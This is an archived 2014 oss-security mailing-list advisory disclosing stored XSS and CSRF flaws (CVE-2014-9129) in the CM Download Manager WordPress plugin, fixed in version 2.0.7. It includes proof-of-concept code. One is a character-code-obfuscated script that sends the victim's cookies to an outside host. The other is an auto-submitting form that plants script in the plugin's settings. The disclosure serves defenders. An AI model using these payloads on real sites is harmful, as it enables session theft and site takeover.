Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <20141202162954.GA32279@kludge.henri.nerv.fi>
Date: Tue, 2 Dec 2014 18:29:54 +0200
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com, bugtraq@...urityfocus.com
Cc: moderators@...db.org
Subject: CVE-2014-9129: XSS and CSRF in CM Download Manager plugin for
 WordPress

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: WordPress plugin cm-download-manager
Plugin page: https://wordpress.org/plugins/cm-download-manager/
Vendor: CreativeMindsSolutions http://cminds.com/
Vulnerability Type: CWE-79: Cross-site scripting
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: N/A. Only assigned for CSRF
Criticality: Low

Vulnerability details:

CM Download Manager plugin for WordPress contains a flaw that allows a stored
cross-site scripting (XSS) attack. This flaw exists because the
/wp-admin/admin.php script does not validate input to the 'addons_title' POST
parameter before returning it to users. This allows an authenticated remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship between
their browser and the server.

Root cause:

The software incorrectly neutralizes user-controllable input before it is placed
in output that is used as a web page that is served to authenticated users.

Proof-of-concept:

Insert following code to CM Downloads -> Settings -> "Downloads listing title"
field with CSRF attack.

<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,
101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,
116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,
105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,
101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,
112, 116, 62);document.write(foo);</script>

- ---------------
Product: WordPress plugin cm-download-manager
Plugin page: https://wordpress.org/plugins/cm-download-manager/
Vendor: CreativeMindsSolutions http://cminds.com/
Vulnerability Type: CWE-352: Cross-Site Request Forgery
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: CVE-2014-9129
Criticality: Low

Vulnerability details:

CM Download Manager plugin for WordPress contains a flaw on the
CMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do not
require multiple steps, explicit confirmation, or a unique token when performing
sensitive actions. By tricking authenticated user into following a specially
crafted link, a context-dependent attacker can perform a CSRF attack causing the
victim to insert and execute arbitrary script code.

Root cause:

The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request.

Proof-of-concept:

<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3>
<form id="f1" method="POST"
action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings">
<table><input type="text" name="addons_title" value="XSS"></table></form>
<script type="text/javascript">document.getElementById("f1").submit();</script>
</body></html>

Notes:

Other pages and/or parameters are also possibly insecure (not tested). Suggested
to do a proper security audit for their software. Vendor did not mention
security fix or CVE in ChangeLog even it was discussed several times. References
below.

Cross-site scripting:
    http://cwe.mitre.org/data/definitions/79.html
    https://scapsync.com/cwe/CWE-79
    https://en.wikipedia.org/wiki/Cross-site_scripting

Cross-Site Request Forgery:
    http://cwe.mitre.org/data/definitions/352.html
    https://scapsync.com/cwe/CWE-352 
    https://en.wikipedia.org/wiki/Cross-site_request_forgery

- ---
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/
l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT
=bUVi
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.